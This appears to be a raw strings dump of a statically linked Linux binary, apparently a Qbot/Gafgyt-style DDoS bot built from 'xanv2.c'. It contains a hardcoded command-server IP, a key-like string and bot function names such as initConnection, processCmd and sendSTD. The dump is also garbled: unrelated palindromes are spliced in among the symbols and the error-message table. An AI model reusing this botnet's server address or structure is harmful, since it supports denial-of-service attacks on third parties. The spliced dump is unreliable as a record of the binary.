PTRh
QVhg
8^_]
</v	
<suB
<du0
<xu0
<Xu0
<uu-
<cuJ
< t	
< t	
D$$P
UWVS
\$HhD3
D$,P
uT;t$
<0#|$
D$(P
4[^_]
UWVS
E,Z9
Z[^_]
UWVS
Degas are we not drawn onward no In union drawn onward to new eras aged
u89K
;U,tK
[^_]
UWVS
u99z
;5<X
[^_]
 h\3
D$ Pj
D$ Ph
UWVS
ZY[^_]
UWVS
[^_]
UWVS
G;<$|
]XKy
[^_]
UWVS
[^_]
UWVS
(<`v
}1C;<$w
D$(!
ZY[^_]
8cu"
Z[^_
ZY@u
UWVS
t:;D$hu
D$p;D$xt*
T$(1
t$0P
UWVS
<\udO
D$4%
D$8@PS
T$8:
T$8:
T$8:
[^_]
UWVS
^8Sh
@t	V
Xht4
8[^_]
UWVS
<rt<
<wt5f
<at-
u(jP
 tdht4
 [^_]
VSh\4
^8Sh
^8Sh
 ht4
~yh\4
UWVS
\$(f
$h\4
^8Sh
[^_]
UWVS
[^_]
UWVS
.u5A
Z[^_]
UWVS
t$hW
t$hW
t$hj
t$TQ
t$`j
<[^_]
UWVS
4/;5<X
*;\$
t$4R
\$09
\$09
t$4S
[^_]
t$LQ
VPX[^_
KHZ[_
VHY[^_
[^_]
UWVS
[^_]
UWVS
Z[^_]
UWVS
L$ 9
T$ 9
L$ 9
T$ 9
L$ )
L$ 9
 [^_]
UWVS
<0u#
$[^_]
UWVS
L$T)
;D$tv
T[^_]
UWVS
;T$(
u/;L$(
G;|$0sW
;\$(sNV
[^_]
UWVS
Y^=~
D$0Z
9L$0s
L$41
D$8@%
D$8f
L$89
H9D$0}	
\$ +\$<
L$LQ
t$HU
D$ +D$<)
D$@y
T$HR
X9T$@|
T$D;
[^_]
UWVS
tWj:U
uFj.S
[^_]
t$ j
UWVS
t$`U
t$`j
D$8Pj
@;D$0v
Z9D$
8[^_]
\$CS
t$LQ
Y[[^_
D$8P
\$d9
t$lW
P[^_
UWVS
Z[^_]
UWVS
[^_]
UWVS
l$:_X
@;D$(|
D$$%
SVRP
;0u%
QRPP
[^_]
Z[^_
tR~P
tB~@=
UWVS
|$T;|$
:*u4
FkD$
D$8Pj
D$<P
T$X)
X[^_]
UWVS
D$KP
<[^_]
UWVS
[^_]
UWVS
[^_]
t$$j
UWVS
[^_]
UWVS
whVUR
[^[^_]
ZY[^_]
UWVS
[^_]
UWVS
 <au
u*z(
u?z=
D$<p
D$D8
|$.f
0000
D$#f
D$Hp
|$P9
D$\;
\$`1
|$#fto
D$#g
[^_]
UWVS
Qj.W
[^_]
UWVS
^8Sh
[^_]
UWVS
[^_]
66.172.10.124
fjh249f20348rh13rf8j13ru310rt
(null)
?/proc/stat
/proc/cpuinfo
processor
/sys/devices/system/cpu
/dev/null
0123456789abcdef
/etc/resolv.conf
nameserver
domain
search
options
timeout
attempts
(nil)
(null)
hlLjztqZ
npxXoudifFeEgGaACScs
 +0-#'I
Unknown error 
Success
Operation not permitted
No such file or directory
No such process
Interrupted system call
Input/output error
No such device or address
Argument list too long
Borrow or rob
Exec format error
Bad file descriptor
No child processes
Resource temporarily unavailable
Cannot allocate memory
Permission denied
Bad address
Block device required
Device or resource busy
File exists
Invalid cross-device link
No such device
Not a directory
Is a directory
Invalid argument
Too many open files in system
Too many open files
Inappropriate ioctl for device
Text file busy
File too large
No space left on device
Illegal seek
Read-only file system
Too many links
Broken pipe
Numerical argument out of domain
Numerical result out of range
Resource deadlock avoided
File name too long
No locks available
Function not implemented
Directory not empty
Too many levels of symbolic links
No message of desired type
Identifier removed
Channel number out of range
Level 2 not synchronized
Level 3 halted
Level 3 reset
Link number out of range
Protocol driver not attached
No CSI structure available
Level 2 halted
Invalid exchange
Invalid request descriptor
Exchange full
No anode
Invalid request code
Invalid slot
Bad font file format
Device not a stream
No data available
Timer expired
Out of streams resources
Machine is not on the network
Package not installed
Object is remote
Link has been severed
Advertise error
Srmount error
Communication error on send
Protocol error
Multihop attempted
RFS specific error
Bad message
Value too large for defined data type
Name not unique on network
File descriptor in bad state
Remote address changed
Can not access a needed shared library
Accessing a corrupted shared library
.lib section in a.out corrupted
Attempting to link in too many shared libraries
Cannot exec a shared library directly
Invalid or incomplete multibyte or wide character
Interrupted system call should be restarted
Streams pipe error
Too many users
Socket operation on non-socket
Destination address required
Message too long
Protocol wrong type for socket
Protocol not available
Protocol not supported
Socket type not supported
Operation not supported
Protocol family not supported
Address family not supported by protocol
Address already in use
Cannot assign requested address
Network is down
Network is unreachable
Network dropped connection on reset
Software caused connection abort
Connection reset by peer
No buffer space available
Transport endpoint is already connected
Transport endpoint is not connected
Cannot send after transport endpoint shutdown
Too many references: cannot splice
Connection timed out
Connection refused
Host is down
No route to host
Operation already in progress
Operation now in progress
Stale NFS file handle
Structure needs cleaning
Not a XENIX named type file
No XENIX semaphores available
Is a named type file
Remote I/O error
Disk quota exceeded
No medium found
Wrong medium type
/etc/hosts
L(knN
CAk[S
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
Tacocat
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
.symtab
.strtab
.shstrtab
.init
.text
.fini
.rodata
.eh_frame
.ctors
.dtors
.jcr
.got.plt
.data
.bss
.comment
libc/sysdeps/linux/i386/crti.S
crtstuff.c
__CTOR_LIST__
__DTOR_LIST__
__EH_FRAME_BEGIN__
__JCR_LIST__
__do_global_dtors_aux
completed.4817
p.4815
frame_dummy
object.4829
__CTOR_END__
__DTOR_END__
__FRAME_END__
__JCR_END__
__do_global_ctors_aux
initfini.c
libc/sysdeps/linux/i386/crtn.S
libc/sysdeps/linux/i386/crt1.S
xanv2.c
printchar
prints
printi
print
getppid.c
unlink.c
getpid.c
time.c
prctl.c
fork.c
waitpid.c
select.c
chdir.c
kill.c
__syscall_fcntl.c
write.c
_exit.c
close.c
toupper.c
__C_ctype_b.c
__C_ctype_b_data
__C_ctype_toupper.c
__C_ctype_toupper_data
__errno_location.c
clock.c
strlen.c
strcmp.c
strcpy.c
memset.c
strchr.c
bcopy.c
strtok.c
next_start.1451
bzero.c
ntohl.c
inet_makeaddr.c
gethostbyname.c
gethostbyname2.c
buf.5561
hoste.5560
connect.c
getsockopt.c
recv.c
send.c
socket.c
signal.c
sigsetops.c
malloc.c
__malloc_largebin_index
free.c
__malloc_trim
abort.c
mylock
been_there_done_that
random.c
unsafe_state
randtbl
random_r.c
random_poly_info
atol.c
strtol.c
_stdlib_strto_l.c
exit.c
sysconf.c
nprocessors_onln
__uClibc_main.c
__pthread_return_0
__check_one_fd
sigaction.c
__restore_rt
__restore
libc/sysdeps/linux/i386/mmap.S
wait4.c
__socketcall.c
open.c
getpagesize.c
getuid.c
clock_getres.c
getegid.c
geteuid.c
sbrk.c
getgid.c
getdtablesize.c
munmap.c
times.c
__syscall_rt_sigaction.c
sigprocmask.c
closedir.c
opendir.c
fd_to_DIR
C.11.3599
readdir64.c
errno.c
__h_errno_location.c
parse_config.c
fclose.c
fopen.c
_fopen.c
_stdio.c
__stdio_mutex_initializer.4711
_stdio_streams
_fixed_buffers
_wcommit.c
fgetc.c
fgets.c
fflush_unlocked.c
fgetc_unlocked.c
fgets_unlocked.c
memmove.c
strrchr.c
strchrnul.c
memcpy.c
strtok_r.c
strcspn.c
strspn.c
strpbrk.c
isatty.c
tcgetattr.c
inet_aton.c
gethostbyname2_r.c
raise.c
calloc.c
realloc.c
dl-support.c
brk.c
__syscall_error.c
getrlimit.c
fstat.c
xstatconv.c
mremap.c
ioctl.c
getdents64.c
_READ.c
_WRITE.c
_rfill.c
_trans2r.c
rawmemchr.c
strncpy.c
ntop.c
inet_pton4
xdigits.3497
inet_ntop4
decoded.c
dnslookup.c
last_id.5618
last_ns_num.5617
opennameservers.c
skip_nospace
skip_and_NUL_space
resolv_conf_mtime.5603
closenameservers.c
get_hosts_byname_r.c
gethostbyname_r.c
poll.c
gethostname.c
read.c
stat.c
llseek.c
sprintf.c
vsnprintf.c
_vfprintf_internal.c
_charpad
_fp_out_narrow
spec_base.4930
prefix.4931
_ppfs_init.c
_ppfs_prepargs.c
_ppfs_setargs.c
_ppfs_parsespec.c
_promoted_size
type_codes
type_sizes
spec_flags.4935
qual_chars.4940
spec_chars.4936
spec_ranges.4937
spec_or_mask.4938
spec_and_mask.4939
_bss_custom_printf_spec
fputs_unlocked.c
fwrite_unlocked.c
strnlen.c
__glibc_strerror_r.c
__xpg_strerror_r.c
unknown.1473
strdup.c
_string_syserrmsgs.c
encodeh.c
decodeh.c
encodeq.c
read_etc_hosts_r.c
uname.c
wcrtomb.c
wcsrtombs.c
wcsnrtombs.c
_fwrite.c
_trans2w.c
_load_inttype.c
_store_inttype.c
_uintmaxtostr.c
_fpmaxtostr.c
exp10_table
memrchr.c
strcasecmp.c
encoded.c
__C_ctype_tolower.c
__C_ctype_tolower_data
fseeko.c
fseeko64.c
_adjust_pos.c
_cs_funcs.c
__fini_array_end
__fini_array_start
__init_array_end
__preinit_array_end
_GLOBAL_OFFSET_TABLE_
__init_array_start
__preinit_array_start
__read_etc_hosts_r
__libc_sigaction
strcpy
recvLine
__socketcall
__GI___ctype_b
__GI___glibc_strerror_r
waitpid
__res_sync
__open_nameservers
__GI_fopen
getrlimit
ioctl
_stdio_openlist_use_count
__GI_initstate_r
__GI_sigaction
strtok_r
__GI_time
getgid
alula
sysconf
stdout
random
__GI_strdup
__GI_getpagesize
getdtablesize
__GI_h_errno
fdopendir
__GI___ctype_toupper
__GI_strcasecmp
recv
connect
__encode_question
__GI___uClibc_fini
numpids
__encode_header
__pthread_mutex_lock
initConnection
__sigdelset
__GI_clock_getres
__xstat32_conv
__uClibc_fini
memrchr
geteuid
inet_pton
__GI_vsnprintf
memmove
__GI_strpbrk
__GI_fgetc
__GI_htonl
__stdio_trans2r_o
munmap
__libc_stack_end
__GI_fclose
__GI_wcsnrtombs
_uintmaxtostr
__libc_fcntl
atol
_h_errno
getc_unlocked
times
__ctype_b
__GI_random_r
errno
getegid
__GI_sbrk
__GI___uClibc_init
getpagesize
getpid
__GI_lseek64
setstate_r
fgets
getHost
__xpg_strerror_r
getc
prctl
memcpy
__GI_fputs_unlocked
__GI_fgets
rand_init
_stdio_openlist_dec_use
__libc_select
_ppfs_init
__GI___C_ctype_toupper
__GI_fgetc_unlocked
trim
__GI_fgets_unlocked
__pthread_mutex_init
getuid
__GI_htons
__open_etc_hosts
malloc
isatty
vsnprintf
__dns_lookup
__GI_read
__C_ctype_tolower
random_r
__dso_handle
clock_getres
gethostbyname_r
socket
select
__GI_ntohl
_pthread_cleanup_pop_restore
Eleele
__GI_wcrtomb
__GI___libc_fcntl
__GI_memset
__GI_closedir
__stdio_seek
__GI_strcoll
__GI_write
__ctype_toupper
__resolv_timeout
__libc_read
__GI_opendir
_string_syserrmsgs
__GI_open
__GI_strchr
__searchdomain
__GI_tcgetattr
__environ
mmap
__GI_ntohs
_Exit
wcsnrtombs
bzero
send
__fgetc_unlocked
abort
__GI_fcntl
__GI_wcsrtombs
__GI_fwrite_unlocked
__GI_getgid
srandom_r
_init
__GI_setstate_r
strtol
__libc_lseek64
strnlen
Beeb
rawmemchr
uname
__malloc_state
__sigaddset
strrchr
__GI_send
h_errno
calloc
__pthread_mutex_unlock
wait4
__register_frame_info_bases
__GI_exit
__app_fini
__exit_cleanup
rindex
__GI_srandom_r
__GI___sigismember
__GI___ctype_tolower
write
environ
__GI_close
fstat
__resolv_lock
kill
fputs_unlocked
__pthread_mutex_trylock
__GI___sigaddset
__GI_brk
__GI_stat
__GI_strtok
_stdio_openlist
__GI_sigprocmask
inet_addr
ntohl
__GI_gethostname
__GI_fseek
_custom_printf_arginfo
ourIP
util_strlen
chdir
fseeko
_stdio_openlist_del_count
connectTimeout
bsd_signal
__GI_times
fseek
mremap
__GI_kill
__GI_strcmp
__GI_memmove
sendSTD
setstate
__decode_dotted
__local_nameserver
__stdio_READ
__GI_toupper
__pthread_initialize_minimal
__GI_recv
__stdin
stdin
__GI_isatty
_custom_printf_spec
gethostbyname2_r
__progname
_start
__deregister_frame_info_bases
__GI_ioctl
rand_str
__close_nameservers
signal
read
__xstat64_conv
__decode_header
__GI___h_errno_location
__GI_memcpy
strcoll
wcsrtombs
_stdio_user_locking
strncpy
unlink
program_invocation_short_name
strcasecmp
htonl
__C_ctype_toupper
__GI___C_ctype_b
realloc
__GI_gethostbyname_r
__GI_strncpy
__libc_send
__GI___xpg_strerror_r
currentServer
readdir64
__GI___C_ctype_tolower
__GI_getrlimit
bcopy
__GI_strcpy
__GI_inet_ntop
strtok
__stdio_adjust_position
malloc_trim
_vfprintf_internal
__GI_poll
fork
__GI___fcntl_nocancel
rand_next
__stdio_rfill
sigaction
__GI_gethostbyname
_dl_phdr
__GI_getc_unlocked
__uClibc_init
__GI_munmap
_store_inttype
__getpagesize
__GI_random
God A red nugget A fat egg under a dog
Do nine men interpret Nine men I nod
__GI_mremap
__syscall_error
__uclibc_progname
__GI_getegid
__GI_wait4
__malloc_lock
__uClibc_main
sbrk
__rtld_fini
__GI_fork
strdup
__libc_close
__GI_getpid
inet_aton
util_memcpy
_pthread_cleanup_push_defer
index
processCmd
__sigismember
fopen
__bss_start
__libc_open
__GI_strchrnul
memset
__GI_socket
main
__glibc_strerror_r
listFork
__stdio_fwrite
srand
__GI_uname
__resolv_attempts
initstate
fclose
__syscall_rt_sigaction
__xstat_conv
ntohs
getppid
tcgetattr
time
opendir
__GI_abort
poll
__GI___sigdelset
__get_hosts_byname_r
__stdio_init_mutex
__GI__exit
strcmp
__GI_strrchr
__nameserver
data_start
__GI_sysconf
__h_errno_location
__GI_inet_pton
gethostbyname
_stdio_fopen
_fini
__GI_chdir
__GI_mmap
ddozingserverz
fgetc
gethostname
sprintf
__get_pc_thunk_bx
strerror_r
__GI_select
__libc_waitpid
strcspn
__GI_waitpid
_stdio_term
__GI_signal
stderr
__GI_readdir64
__C_ctype_b
srandom
_ppfs_setargs
__libc_fork
__atexit_lock
__fcntl_nocancel
getsockopt
__GI_fseeko64
fflush_unlocked
__stdio_wcommit
__GI___fgetc_unlocked
__GI_unlink
__nameservers
fwrite_unlocked
stat
__pagesize
_stdio_openlist_add_lock
__GI_getdtablesize
__GI_gethostbyname2
_edata
__stdout
__GI_memrchr
__GI_fflush_unlocked
__searchdomains
__GI_fstat
_end
htons
util_strcpy
_sigintr
_ppfs_prepargs
__GI_strspn
fgetc_unlocked
initstate_r
__GI_connect
__curbrk
_dl_phnum
_fpmaxtostr
__errno_location
_stdlib_strto_l
exit
__stdio_WRITE
_stdio_init
__GI_geteuid
inet_ntop
gethostbyname2
_dl_aux_init
_errno
atoi
_stdio_openlist_del_lock
__GI_inet_aton
_custom_printf_handler
fgets_unlocked
_exit
szprintf
strspn
__libc_recv
__getdents64
strlen
lseek64
open
program_invocation_name
A Santa lives evil at NASA
toupper
__libc_write
__malloc_consolidate
_ppfs_parsespec
__GI_strtol
__GI_getuid
clock
__GI_strtok_r
__GI_errno
__stdio_trans2w_o
__GI_config_read
strchr
__GI_rawmemchr
__GI_gethostbyname2_r
__GI_raise
__data_start
__GI_inet_addr
__GI_config_open
closedir
__encode_dotted
__GI_strnlen
_Jv_RegisterClasses
__GI___errno_location
strchrnul
fcntl
__GI_atoi
fseeko64
__GI_sprintf
__ctype_tolower
wcrtomb
close
rand_alphastr
__GI_config_close
__libc_connect
__GI_strlen
mainCommSock
pids
__progname_full
strpbrk
_load_inttype
raise
free
__GI_strcspn
sigprocmask
